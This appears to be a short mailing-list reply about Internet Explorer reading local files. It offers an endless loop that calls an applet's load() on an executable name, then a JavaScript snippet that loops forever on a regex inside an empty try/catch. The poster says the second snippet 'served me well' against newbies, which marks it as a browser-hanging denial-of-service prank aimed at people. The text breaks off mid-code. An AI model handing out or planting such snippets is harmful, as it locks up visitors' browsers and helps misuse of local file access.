Re: Internet explorer can read local files

Thanks to IE's liveconnect features the whole applet should be fully
scriptable, decompiling the applet revealed that there is a public load
(String name) function so you probably can get something like this to work

while (true) {
    xmldso.load('myexefile.exe');
}

here's another code snipped that does what you discribe, It served me well
in the past to get rid of newbies asking how to convert a string to an
integer *grin*

<script language="javascript">

 while (true) {
  try {

   pattern = new RegExp("(a?)b(\\1{2})+c","g");
   text = "bc";
   match = pattern.test(text);

  } catch(exception) {

  }